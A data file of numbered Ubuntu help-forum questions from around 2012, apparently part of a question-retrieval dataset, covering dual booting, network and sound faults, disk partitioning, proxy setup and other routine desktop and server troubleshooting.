201153	can not detect wireless network after reboot	at first i could detect wireless networks , but after rebooting i can no longer activate the wireless card . i can connect however to the internet via cable , wired connection but not wireless how do i detect and connect to my wireless network ?
201154	how can i dual boot ubuntu 12.04 and windows 8	i was wondering how can i dual boot windows 8 and ubuntu 12.04 without any problems or errors . i am on windows 8 build 8400 .
201156	dual-boot windows 7 and ubuntu 12.04.1	i installed ubuntu 12.04.1 alongside windows 7 . i wanted to check out what it 's all about . by the way , i actually like the interface a lot and the free office suite is very very nice . i love how they can save to the .docx as well . onto the story : i installed it using this tutorial and i set it all up and everything and things were great . i used the easybcd 2.2 tool and created an ubuntu 12.04.1 entry and when i boot the computer the windows 7 and ubuntu 12.04.1 option show up . however , when i click ubuntu it does not boot . it say and error and says i must put in the windows cd to repair or something like this . here 's my system specs : asrock extreme4 ( eufi bios ) corsair vengaence 2x4gb nvidia geforce 9800gt i5-3570k 3.4ghz corsair 620w modular 500gb wd caviar blue i have no clue what could be wrong with it and i would love any assistance . i am willing to mess around and if something happens wrong i can just reinstall windows and it wo n't be a huge deal . thank you very much ! here are my partitions i made : /boot 500mb / 10000mb /home 20000mb swap area 4000mb bios 4000mb
201158	error when installing rmagic gem on ubuntu 12.04 for ruby on rails	i am trying to get my ruby on rails application working and installing rmagic gem . but i get an error that says `` ca n't install rmagick 2.13.1 . ca n't find the imagemagick library or one of the dependent libraries . '' altough i have imagemagick installed with its dependences . terminal log : http : //pastebin.com/vcgkbwzr i even tried to installed rmagic from synaptic , but i get the same error when i run `` bundle '' command . through my search , some people had problem with lib dependencies , but i believed i have them all installed . another solution i found is this ( error installing rmagick from gem ) a little bit old and not sure if it is going to work for 12.04 . but , i do n't know where those configurations should go .
201162	ubuntu not install on windows 7	first time on forum and using ubuntu . i checked and didnt see this issue . i downloaded and burned ubuntu 12.04 x64 on a cd , restarted computer , and booted from cd . boot went normally through all the options , connected to wifi , chose to install ubuntu alongside windows . at beginning of installation , dvd drive opened and a message popped up saying to remove installation media , close drive and press enter . followed instructions , and computer then proceeded to boot windows with no installation taking place ... what should i do ? running toshiba satellite laptop with core2duo @ 2.0 ghz 4 gb ram windows 7 ultimate x64 thanks
201164	proper alignment of partitions on an advanced format hdd using parted	first i create a properly aligned partition in a new gpt table using parted by specifying percentages for start and end of the partition : # parted -a optimal /dev/sdb gnu parted 2.3 using /dev/sdb welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) mktable gpt warning : the existing disk label on /dev/sdb will be destroyed and all data on this disk will be lost . do you want to continue ? yes/no ? y ( parted ) mkpart primary 0 % 1 % ( parted ) p model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sdb : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 2097kb 1049kb primary ( parted ) quit note that this disk is using advanced format , but correctly reports the physical sector size of 4096b to parted . let 's look at it again , using sectors as the unit : # parted -a optimal /dev/sdb gnu parted 2.3 using /dev/sdb welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) unit s ( parted ) p model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sdb : 5860533168s sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 2048s 4095s 2048s primary ( parted ) quit why did it start the partition at 2048s and not 34s which is the first possible sector ? 34s is not a properly aligned start sector if the physical sector size is 4096b and the logical ( which is the one you specify in parted ) sector size is 512b . a properly aligned start sector is one divisable by 8 ( since physical sector size / logical sector size = 8 ) . but that means 40s is the first properly aligned start sector , yet it 's not used . why ? if we try to create a properly aligned partition of 100mib capacity starting at 40s in a fresh gpt partition table : # parted -a optimal /dev/sdb gnu parted 2.3 using /dev/sdb welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) mklabel gpt warning : the existing disk label on /dev/sdb will be destroyed and all data on this disk will be lost . do you want to continue ? yes/no ? y ( parted ) mkpart primary 40s 204839s warning : the resulting partition is not properly aligned for best performance . ignore/cancel ? i ( parted ) unit mib ( parted ) p model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sdb : 2861588mib sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 0.02mib 100mib 100mib fat32 primary ( parted ) ( parted ) unit s ( parted ) p model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sdb : 5860533168s sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 40s 204839s 204800s fat32 primary ( parted ) we still get the warning : the resulting partition is not properly aligned for best performance . warning , even though 40s and 204840s ( 204839s + 1 ) are both divisable by 8 . why ?
201171	ethernet connection does n't work	not sure what happened over the weekend ( possibly the last sudo apt-get upgrade i ran this morning ? ) , but i noticed that my computer 's using my phone 's internet connection ( connected via usb and listed as `` wired connection 2 '' ) instead of my ethernet connection ( `` wired connection 1 '' ) . i 've tried restarting networkmanager with sudo service network-manager start and stop , but that does n't appear to fix anything . rebooting does n't change anything either . adding my static ip address information to /etc/network/interfaces did n't help , so i removed that again . i tried the steps in this answer , but that did n't fix it either . grep -i eth0 /var/log/syslog gets me : oct 15 10:27:30 bdares networkmanager [ 772 ] : < info > ( eth0 ) : now managed oct 15 10:27:30 bdares networkmanager [ 772 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 15 10:27:30 bdares networkmanager [ 772 ] : < info > ( eth0 ) : bringing up device . oct 15 10:27:30 bdares networkmanager [ 772 ] : < info > ( eth0 ) : preparing device . oct 15 10:27:30 bdares networkmanager [ 772 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] oct 15 10:27:30 bdares kernel : [ 21.419591 ] r8169 0000:03:00.0 : eth0 : link down oct 15 10:27:30 bdares kernel : [ 21.419690 ] addrconf ( netdev_up ) : eth0 : link is not ready ifconfig -a : eth0 link encap : ethernet hwaddr 30:85 : a9:96 : dc:17 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0xc000 eth1 link encap : ethernet hwaddr e6 : ce:8f : c3 : a2 : b1 inet addr:172.20.10.2 bcast:172.20.10.15 mask:255.255.255.240 inet6 addr : fe80 : :e4ce:8fff : fec3 : a2b1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1269 errors:0 dropped:0 overruns:0 frame:0 tx packets:1321 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:635761 ( 635.7 kb ) tx bytes:189206 ( 189.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:262 errors:0 dropped:0 overruns:0 frame:0 tx packets:262 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:34268 ( 34.2 kb ) tx bytes:34268 ( 34.2 kb ) here you can see that my phone is called eth1 . what can i do ?
201174	why ca n't i access hw:1,0 until gstreamer-properties is run once ?	not necessarily an ubuntu-specific question but i was n't sure where else to ask . i have an avermedia dvd ezmaker 7 which plugs into usb and works well on ubuntu 12.04 . i downloaded and installed the official drivers without error . however , when i try : gst-launch alsasrc device= '' hw:1,0 '' ! alsasink device= '' hw:0,0 '' it tells me : setting pipeline to paused ... pipeline is live and does not need preroll ... setting pipeline to playing ... new clock : gstaudiosrcclock which is the normal output , however there is no audible sound . trying the command again does n't help . if i run gstreamer-properties and close it right away ( do n't need to touch any controls ) , then the gst-launch command works . if i unplug the device and plug it back in or restart the computer , i have to run gstreamer-properties again . what is gstreamer-properties doing that enables the audio ?
201185	tor and polipo installation steps	i am having a problem of installing and configuring tor and polipo on ubuntu 12.04 lts . i want to patch it in the system . i do n't want to use the normal vidalia program and browser . i need exactly to make it run in the system background and then i choose what to connect to it .. browsers or chat clients .. please i need set by step help and command line .. tor website doesnt show the exact help i needed
201193	how do i stop 12.04 and 12.10 update to pae during fresh install	the default kernel is pae version , but when i plus 4g ram on mb . it stil update to lastest pae kernel , can i stop it ? why server will not but desktop will ?
201195	sound problem on lubuntu	i get no sound whenever i play any music file , but i do n't get any error message either . youtube works properly . curiously , early in the morning i used clementine without problem , and now this . ideas ?
201198	touchpad stops working after login	my gf 's touchpad has started acting funky since she hooked it up to a projector . it works alright on startup , but as soon as she gets out of the login screen , the cursor freezes up and she has to use a usb mouse . i saw another thread for the same problem here , but none of the five solutions seemed to work.we 're in 12.04
201201	usb keyboard and mouse not active until over 3 minutes after login appears	after installing 64 bit ubuntu 12.04 it takes over 3 minutes after login appears before the keyboard and mouse will operate
201202	error while loading shared libraries libsdl-1.2.so.0	i am trying to install ioquake on my ubuntu server . when i try to run it , i get this message : # ./ioquake3 ./ioquake3.x86_64 : error while loading shared libraries : libsdl-1.2.so.0 : can not open shared object file : no such file or directory i thought i had everything working right , here is where the libsdl is : # cd /usr/lib64 # /usr/lib64 # ls -l total 2308 lrwxrwxrwx 1 root root 15 oct 15 00:25 libsdl-1.1.so.0 - > libsdl-1.2.so.0 lrwxrwxrwx 1 root root 20 oct 15 00:25 libsdl-1.2.so.0 - > libsdl-1.2.so.0.11.4 -rwxr-xr-x 1 root root 2358903 jan 19 2012 libsdl-1.2.so.0.11.4 and my path : # echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib64 what am i doing wrong ?
201204	if i remove hdd with ubuntu from one notebook and plug in it to another , will it be fully functional ?	i removed it from dell inspiron 1501 and connected to acer aspire 5100 via sata-usb cable and it work normal . i am not experienced user , so i 'm runned no tests on it . now i want to buy toshiba satellite l850d-bjs and reconnect my hdd to it . will it work and what can happen ?
201208	how to resize launcher on ubuntu 12.04 ?	ther is no slider bar for adjusting launcher in system settings - > appearance .
201211	polipo e : sub-process /usr/bin/dpkg returned an error code ( 1 )	@ me : /home $ sudo apt-get install polipo reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : polipo 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 198 kb of archives . after this operation , 799 kb of additional disk space will be used . get:1 http : //sy.archive.ubuntu.com/ubuntu/ precise/universe polipo amd64 1.0.4.1-1.1 [ 198 kb ] fetched 198 kb in 2s ( 97.5 kb/s ) selecting previously unselected package polipo . ( reading database ... 169595 files and directories currently installed . ) unpacking polipo ( from ... /polipo_1.0.4.1-1.1_amd64.deb ) ... processing triggers for doc-base ... processing 1 added doc-base file ... processing triggers for man-db ... processing triggers for install-info ... processing triggers for ureadahead ... setting up polipo ( 1.0.4.1-1.1 ) ... starting polipo : could n't open config file /etc/polipo/config : 2. invoke-rc.d : initscript polipo , action `` start '' failed . ****dpkg : error processing polipo ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : polipo e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ****
201214	mobile broadband connection terminating automatically after 2-3 minutes	i am connecting my mobile device with ubuntu to access internet , it connects easily but after 2-3 minutes it automatically disconnect and then i have to disconnect my mobile device and then reconnect it again to establish a connection . cant understand what is the problem . no problem with my device as it works flawless with windows . as asked here is more info : device is samsung wave 575 network provider is vodafone and ubuntu is 12.04
201215	harddisk not detected after restart ?	i have a hardisk installed windows 7 ultimate . i installed ubuntu 12.04 by pen drive . after sometime it hanged . after waiting sometime , i press the key of reboot . after that one messege appeared `` no boot device found '' . then i went to my bios settings there i could not find my hardisk .
201217	how do i get rhythmbox to play mpeg1 files ?	i am new user and i installed ubuntu 12.04 with dual booting . as i played a song its not working asking a mpeg1 to install for the song . is there any alternative to play the song without installation . i searched the sites and i found to install sudo apt-get install ubuntu-restricted-extras i have connected internet from android mobile through tethering . i can access internet but it is very slow in downloading . i am trying from software center but its taking lot of time to install . please help me to download the package via terminal and to download faster .
201224	disabling clipboard completely in ubuntu - openbox environment	we are working on a project of ubuntu customization with openbox . for some specific requirement , we need to disable the clipboard completely in the system . i have searched a lot over openbox and gnome configurations to achieve this goal but no luck till now . does any one have any clue on this ? or , is there any other way to make ctrl+c , ctrl+v and ctrl+x unusable ?
201227	how to disable ctrl+q system wide	how to disable ctrl+q system wide ? i read the other answers but they did not help . reassigning the shortcut is not possible , since pressing the key combination quits the settings window , so it does not have any effect . thanks in advance .
201230	uninstalling kubuntu from ubuntu	i have installed kubuntu and lubuntu with my ubuntu 12.04 lts . i now want to delete kubuntu and lubuntu . i have done this sudo apt-get remove kubuntu-plasma-desktop lubuntu after removing a lot of files , i went back to the log in menu and i can still see kubuntu and lubuntu , lxde , lxde/openbox , kde/openbox , kde plasma desktop . i do n't want them and i have no idea how to remove them .
201234	what are the necessary packages for build , compile application and install it by creating make file ?	i want to install packages with using make file . what are the necessary packages for build , compile package and install make file ?
201246	progress bar or percentage while copying in terminal	is there a way to enable the progress bar while using the cp command in terminal ?
201248	folders and files permission problem	i just installed ubuntu server 12.04 , now when i create any folder in www/ the default permission is creating problem and every time i have to give permission manually . please give me the command to run so that when i create any folder or file in the www directory i do not have to give permission and it run by default . thanks in advance
201252	print problem : page squeezed in half	i 've just managed to successfully set up my printer ( canon mx320 ) using the printing app on ubuntu 12.04 . however the only 1 remaining problem is that each time i tried to print it will only print the file on the top half of the page only : meaning that for some reason , the printer `` squeezes '' the whole content of each page in the file to fit into the top half of the page only ( so the proportion in the print-out is not correct vertically ) . this happens with every type of file i tried to print ( documents , images , web pages ) . i checked the printing 's setting & properties and could n't find anything related to this issue yet and i 've already made sure to set all the information correct ( paper size , source etc. ) . the print preview always display correctly on the screen , but it 's only the actual print-out that shows this problem . i also tried with several different types of papers ( a4 , photos etc . ) but the result is always the same : the printer keeps putting the content in the top half of the paper only .
201255	ubuntu can not boot	i 've ubuntu 12.04 installed along with windows 7 . after trying to update the geforce driver on ubuntu ( already updated on windows ) , ubuntu fails to boot . it will only give me a black screen and ask for log in user name and password and stays on the black screen . i 've tried to fix it from a boot repair disk , which had generated a long report and then told me that wubi.exe is not found . how can i retrieve my [ revious installation , or fix it please ? if not possible what is the best procedure to re install ubuntu without affecting the partitions please . regards ,
201259	opening programs very slow on ubuntu 12.10	when i open any program for first time after boot , it loads very slowly ( does n't matter how long after boot ) . for example , terminal takes 2-3 seconds , skype and firefox often take much longer . if i close it and open again , it loads in reasonable time ( < 1 second ) . i got intel core i5-2500k cpu @ 3.30ghz , so it should n't be hardware issue ... what is causing this ? disk benchmark : average read time : 115.5 mb/s ( 100 samples ) average write time : 98.7 mb/s ( 100 samples ) average access time : 11.79 msec ( 1000 samples )
201263	shutdown and user button missing in panel	i faced with a problem after update , i missed 2 buttons from above panel , system menu ( including shutdown , suspend & … ) and user ( including log out & … ) how can i restore them ! ? ...
201266	can i install ubuntu one server on my private cloud ?	so ubuntu one seems feature rich , and looks like a serious alternative to some of the other `` host your own '' file syncing software out there ( i 've tried ifolder and sparkleshare , but for different reasons , they 're not suitable ) . is there any concept of taking ubuntu one , and hosting it privately on my own server , and then using the clients to connect to my server ? or am i missing the point ? any answers , even a `` you do n't want ubuntu one , you want ( insert name of ubuntu alternative ) '' is fine .
201267	ask about same software like putty	i want to share document in remote computer . through which software can be supposed same like putty in ubuntu 11.10 ?
201268	need help installing ubuntu on an hp mini netbook	i have a hp mini netbook that has been wiped clean , there is nothing other than the bios on it , it has no dvd and i do n't have an external dvd . i can change the boot order to boot from a usb device . i have downloaded ubuntu-12.04.1-desktop-i386 i have one of these http : //www.kikatek.com/p100600/34609-iomega-250gb-select-portable-hdd-2-5-usb ? source=froogle currently formatted to ntfs but i can format to exfat i have tried linuxlive usb creator , all that managed to do was dual boot the desktop pc that i 'm working off , and when booting on the wiped clean netbook , just left me with a black screen with a blinking cursor i have also tried unetbootin , this managed to change my 'my computer ' icon to install ubuntu ( c : ) and now again , my desktop pc dual boots with the wubi software , the unetbootin , would n't let me select my external drive to write to
201281	can i scale out the mysql charm instead of adding another database ?	i have question how to scaling mysql service because i make deployment from here : https : //juju.ubuntu.com/docs/user-tutorial.html and i have wordpress and mysql related but is there possible to scale only mysql ? when i add-unit mysql i recieve another mysql database instead . and is there possible to write charm where nodes will be share performance ? i have server based app ( making some calcutaions and recievieng data and send data to clients ) in java . is there possible to scale up this application and make it faster ( i mean manage more clients ) ?
201286	after deploying wordpress 502 bad gateway	i have this : 2012-10-15 12:25:19,359 info connecting to environment ... enter passphrase for key '/home/hsf/.ssh/id_rsa ' : 2012-10-15 12:25:21,902 info connected to environment . machines : 0 : agent-state : not-started dns-name : node-001185e6772b.local instance-id : /maas/api/1.0/nodes/node-d573ebf6-1382-11e2-b4d1-001185e677fe/ instance-state : unknown 1 : agent-state : running dns-name : node-00127968a7be.local instance-id : /maas/api/1.0/nodes/node-19a7ac3c-1382-11e2-b4d1-001185e677fe/ instance-state : unknown 2 : agent-state : running dns-name : node-001185e6787e.local instance-id : /maas/api/1.0/nodes/node-27e902d0-1447-11e2-ae60-001185e677fe/ instance-state : unknown 3 : agent-state : running dns-name : node-001185e67955.local instance-id : /maas/api/1.0/nodes/node-f12b26a8-1458-11e2-8c58-001185e677fe/ instance-state : unknown services : mysql : charm : cs : precise/mysql-8 relations : db : - wordpress units : mysql/2 : agent-state : started machine : 2 public-address : node-001185e6787e.local wordpress : charm : cs : precise/wordpress-9 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/1 : agent-state : started machine : 1 open-ports : - 80/tcp public-address : node-00127968a7be.local wordpress/2 : agent-state : started machine : 3 open-ports : - 80/tcp public-address : node-001185e67955.local 2012-10-15 12:25:23,097 info 'status ' command finished successfully and when i type ip adresses of my wordpress nodes i recieving this : 502 bad gateway nginx/1.1.19 i do n't know what is going on . please help .
201289	cheese/gnome/unity - video not detected	i am pretty new to linux and would like to seek help from experts . my issue is that when ever i start my camera software/ skype i either get a black screen or just that the webcam is not detected . i tried following the forums and community in ubuntu but reached to no solution in my case . i have tried doing a unity -- reset and found warning and error messages regarding the video warn 2012-10-15 11:39:28 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` inforequest '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video warn 2012-10-15 11:39:28 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` setviewtype '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video please could some one guide me through . my laptop is acer aspire 5710g and it uses acer crystal eye webcam . best akshay
201294	my ubuntu crashed , ca n't log into the system , what went wrong ?	i 'm very new to ubuntu . i did this : sudo apt-get -f install and when i rebooted the system , i could n't log into the system . when i proceed with the user name and password i get a small pop-up saying : failed to load session gnome ( log out ) what went wrong ? are there any ways there to get back to my previous state ? thanks in advance .
201296	xrdp keyboard settings not working in a terminal	i 'm working with ubuntu 12.04 , in french , with belgian keyboard . i 'm also using xrdp 0.5.0-2 . i did setxkbmap -layout be sudo cp km-0409.ini km-0409.ini.bak sudo xrdp-genkeymap km-0409.ini using remote desktop connection under windows 7 , the login screen seems ok . the keyboard is belgian . alt-gr keys are working . but in a terminal : alt-gr keys are not working arrows keys are not working insert/home/pg up/pg donw/end/delete are not working on the numeric keypad , / and enter are not working . what can i do ?
201300	launching a ruby script from the bash does not work , even with the shebang	i am using ubuntu 12.04 64 bits . i 've recently installed the ruby1.9.1 package and the wx-ruby gem using : sudo gem install wxruby-ruby19 in order to install the ruby1.9 compatible version . so i wrote a ruby script called fenetre_wx.rb ( which has already execution right ) # ! /usr/bin/env ruby require `` wx '' include wx class fenetreprincipale < app def on_init frame.new ( nil , -1 , `` my app in ruby with wxruby '' , point.new ( -1 , -1 ) , size.new ( 640,480 ) ) .show end end fenetreprincipale.new.main_loop no problem when i call ruby fenetre_wx.rb but when i do : ./fenetre_wx.rb i get the following error : bash : ./fenetre_wx.rb : aucun fichier ou dossier de ce type which can be translated by : '' no file nor directory of this type '' : i 've got the french version , but maybe my translation is wrong , so i left the original text . does someone know what 's wrong ? thanks in advance .
201303	what is < defunct > for a process and why it does n't get killed ?	the chrome browser was not responsive and i tried to kill it , but instead of disappearing the process had < defunct > at its right , and did n't got killed : what is < defunct > for a process and why it does n't get killed ?
201305	can selinux affect apache	can selinux , in any way , cause apache to only store web-site files on one partition ? i 'm unable to set up a localhost http server with apache using html files that are on another mounted partition . i can access the html files in /var/www , but not on /media/http_server/web_files .
201307	how to change the location a shortcut is linked to ?	i have 12.04 , the initial user account name is google , then i changed the user name from google to linux . i move /home/google to /home/linuxand update the /etc/passwd file . but now , when i click the shortcut in unity , say , the downloads , then give me no such /home/google/downloads directory since already renamed to /home/linux/downloads i can create the /home/google as symbol link to /home/linux , it 's working , but i do want to change the directory/path the downloads shortcut point to . so , do you know how to change the property of the shortcut ?
201309	was /media mount point location a planned change ?	i would like ask an important question regarding ubuntu 12.10 installation on my laptop t500 ... those partitions which are not explicitly defined in fstab gets mounted to /media/ < username > / < label > . is this a bug or a change made my developers .
201317	wrong autocompletion with sudo apt-get	does anybody know why if i type : apt-get upg < tab > i get : apt-get upgrade but if i type : sudo apt-get upg < tab > i get : sudo apt-get upgrade-from-grub-legacy
201319	how to set up a canon mf8000 series ( i-sensys mf8030 ) multifunctional on ubuntu ?	we 've got a canon i-sensys mf8030 multifunctional ( printer + scanner ) an our new office , everybody are happy with it using windows 7 but i want to be able to print from ( and scan to if possible ) my ubuntu ( xubuntu actually ) system . i 've tried to set it up as a generic pcl laser printer but that does n't work . can anybody help ?
201323	wubildr.mbr missing or corrupt 0xc0000098	i know there are like a million question like this , but i tried everything they say and i still have that problem . i downloaded wubi , and executed it . before that , i did a partition ( : e ) only for ubuntu , and told wubi to install ubuntu there . when it finishes , i reboot , and when i choose ubuntu ( between ubuntu or windows 7 ) , this is what appears : the file must be missing or corrupt : \ubuntu\winboot\wubildr.mbr 0xc0000098
201328	dual monitors and defining defaults	running ubuntu 10.04 , i have been using an external monitor in addition to the internal monitor on my asus eee pc 1005ha . the issue that i am experiencing is that the screen positions reset to a default every time i restart my system . if i leave the vga cable attached to my laptop , when i restart my system , the screen setup is : if instead , i leave the cable unplugged , and do not attach it until my system has started , it will recognize the second monitor , but they are immediately arranged as seen here : ideally , i would like define the following setup as the default : i know that i can change this setup each time by accessing the system - > preferences - > monitors , but is there a way to define defaults for each time the system restarts or each time a new monitor is detected ?
201329	how to do a sudo verification that lasts long enough for ( unprivileged ) make to finish ?	i often use the following construct for building and installing a tarball : sudo -v & & make & & sudo make install which will allow me to enter my password immediately and have everything done unattended . this works well except in the rare case that building takes longer than the sudo timeout , which may happen on my rather slow machine with large projects ( even when using make -j4 ) . but when the build takes a long time , that 's exactly when doing things unattended has a great advantage . can anyone think of a shell construct that allows me to input my password immediately , and which has make executing under normal permissions and make install under elevated permissions ? for security reasons , i do n't want to configure my user to use sudo without password . a viable option is to set the timeout to very long , but i 'm hoping for something more elegant .
201334	having both gnome and kde without the need to switch between them	is it possible to install and run both gnome and kde on ubuntu and enjoy the best of both worlds without having to switch between them ?
201339	is there any driver for usb 3.0 in ga-b75m-d3v ?	i got a new computer last week ( with motherboard ga-b75m-d3v ) . on it 's motherboard , there is a usb 3.0 port . i tried to use it for transfer a big data to my harddisk by ubuntu 12.04 . but the speed is n't as speed as i use on my laptop ( reach 92.2 mbps on my laptop , but on my new computer it is only 21.2 mbps - like ordinary usb transfer ) . i tried to look on additional driver , but only graphic driver shown there . is ubuntu 12.04 support usb 3.0 natively ? if not , is there any driver for usb 3.0 on my motherboard ?
201340	after installing ubuntu , windows does not recognize hard drive	i installed ubuntu alongside windows on my netbook . the ubuntu install corrupted my windows . so , i formatted the windows partition in ubuntu ntfs by itself . only now boot windows does not recognize my hd ! when i try to reinstall windows , windows does not find my hard drive . what do i do ? help !
201347	sound problem with onboard sound and usb sound	last week i 've updated my hardware and after installing ubuntu 12.04 i has some problems with the sound , there was : 1 ) i replaced the old mainboard with a asus p8h77-m pro board with onboard sound and found out that i did n't have any sound controls : system settings - > sound did not respond . answers to this problem were : go to the sounds settings . this does n't work when sounds controls are n't willing to open . ( would like a sollution for this ) i uninstalled pulseaudio and rebooted . through the gnome alsamixer i could set the master output and sound is working now , although not as i would like it to work . audio control now opens but no devices/settings can be found . 2 ) my second problem is the usb sound device not showing up . i 've used this usb headset on my old system so i know this should be working . what are the things that i can check to figure out what the problem is ? alsa mixer is showing an usb device and output is set to max but still no sound . pulse did recognise it was a logitech but i had no sound there as well ( se first problem ) . i 'm a novice user . thanks in advance .
201348	how to `` undo '' ( revert ) ctrl+l ?	i 'm on 12.04 desktop . when browsing the file system , it 's convenient to type ctrl+l so as to get the file path `` location '' to render as a string ; i can then modify the file path or even paste something in and get redirected right where i want to go . but often , after typing ctrl+l , i find myself wanting to revert back to the normal way nautilus renders the file path ( as a series of buttons/links ) . what 's the magical shortcut to `` undo '' ctrl+l and go back to `` normal mode '' ? thanks in advance !
201349	wireless connection problems	upgrade manager rec . ubuntu12.4 which i downloaded using a wireless connection . worked fine for 5 days then lost connectivity , can only connect using wired . am being asked to 'authenticate ' with wireless password and admin . password but nothing works . the signal is there and so is the network but no recognition . have also tried changing password . someone suggested re-installing but i would have to do that from ubuntu software manager and use usb or cd . i am a novice at this as you 'll have gathered . any help please . thanks
201352	karnaugh map software for ubuntu that accepts formula	anybody knows of a karnaugh map software for ubuntu where i can input a boolean formula e.g a+b ( c+d ) and the software translates it into a karnaugh map ?
201355	no suspend/hibernate after last apt-get upgrade	suspend does not work anymore after my last apt-get upgrade on my precise lenovo x200 . i could n't find any error messages besides : # sudo pm-suspend flock : 3 : bad file descriptor there is no syslog/messages output when executing that command . any ideas ? cheers , jan
201356	should i enable backports repositories on ubuntu server ( lamp ) ?	is there any disadvantages/advantages on enabling backports repositories on my new ubuntu server ( lamp ) ? what i should choose ? cheers
201359	is there a program to charge/discharge the battery automatically without the need to unplug the ac adapter everytime ?	i want to give some life to my old laptop , and recalibrate the battery ( old now ) . when reading around on forums , the common info is to turn on the pc , drain the batt , even from bios , and then recharge batt without having the pc on , and repeat cycle until satisfied . i hope there is a way to soft up this via acpi without the need to actually let the pc die out of misery . i was hoping for a program that when running , shall unlink the actual ac power source from the battery charging mechanism . so when program is running , even if the laptop is plugged , it shall use the power from battery until fully drained , then , once drained , it starts recharging . all this without shutting down the pc when no power from battery . i have checked all around , and the only softwares found are actually fancy readers for the bat0/info data or behaviour modifier for the rest of the pc . has any of you ever heard of a software doing this ?
201361	firefox does not listen to my settings	in firefox , the first time it boots it always tries to reopen previous tabs ( and fails ) , even though i 've set for it to open things in new tabs . it seems any secondary windows open in the homepage ( as it should ) . any idea where i should look ?
201364	having problems booting xubuntu after installation	i 'm newbie with ubuntu , i tried to install ubuntu , at the beginning xubuntu work for the first upgrade to xubuntu 12.04 , but after the reboot , no winxp media center ether xubuntu wo n't start and i have a screen ctrl+alt+del nothing else . i read a little about , maybe the sata enabled on the bios . what is the problem and can it be fixed or do i have to remove xubuntu . partition is : 100gb xubuntu 220gb winxp i have an external drive 1 tb thanks for the help .
201365	dual screen sleep problem	when the computer wakes up ( so when i re-log in after he went to sleep ) the 2nd screen is a bit messed up . let 's try to explain that better : the content is shifted to the left , meaning that the left part of the window in the right screen is not visible and on the left part of the screen there is a black area . one image is worth a thousand word , so here comes a screenshot of the problem : hum , when i take a screenshot the problem is not showing , the 2nd screen looks fine . so here comes a regular foto : so there you can see the 2 sides i am missing . please ask me if you need more info ( and if you give me the command in order to get the info you need you 'll save me some google search : ) thanx for reading
201379	logitech microphone ( ak5370 ) inaudible volume	i bought this microphone from amazon last week . it 's detected just fine in 12.10 . i can see it in the sound preferences . the problem is that the volume is so low as to be inaudible , even when turned up to maximum in this dialog . it is working , as i can see that the meter responds to noise , but it 's just too low . alsamixer 's control is the same , so that does n't help . i tried messing around in pulseaudio too , but to no avail . in lsusb it 's bus 002 device 004 : id 0556:0001 asahi kasei microsystems co. , ltd ak5370 i/f a/d converter .
201381	will squid-deb-proxy be used for release upgrades ?	i am in the process of updating a bunch of machines to 12.xx . for regular package updates i tried apt-proxy , which had random hiccups ( clients hanging on various headers ) . now i installed apt-cacher-ng , but that seems not to work when running do-release-upgrade ( i 'm guessing because the special update-info does not match some url pattern of apt-cacher-ng ) : user @ machine : ~ # sudo do-release-upgrade -- proposed checking for a new ubuntu release failed upgrade tool signature done upgrade tool done downloading authenticate 'lucid.tar.gz ' against 'lucid.tar.gz.gpg' exception from gpg : gnupg exited non-zero , with code 131072 debug information : gpg : ca n't open `/tmp/tmpjcfo-a/lucid.tar.gz.gpg' gpg : verify signatures failed : file open error authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . now i read about squid-deb-proxy and the dynamic broadcasting seems neat , especially since we have notebooks in our office . will that proxy work with do-release-upgrade or should i set up my own squid altogether ?
201388	how can i move the close/minimize/maximize buttons on the unity panel ?	i followed these instructions to move the minimize/maximize/close buttons no the upper right of a window . they involve running gconf-editor and changing the order of the buttons . its pretty annoying though that the unity panel keeps the buttons on the upper left , so the effect is when the window is maximized , the buttons show on the upper left but when the window is not maximized they show up in the upper right . is there any way to make the unity panel consistent with the gconf-editor button settings ?
201390	how can i stop a joystick from controlling my mouse ?	how can i stop a joystick from controlling my mouse in ubuntu 12.04 ? i tried to remove xserver-xorg-input-joystick and /usr/lib/x11/xorg.conf.d/10-joystick , both not installed .
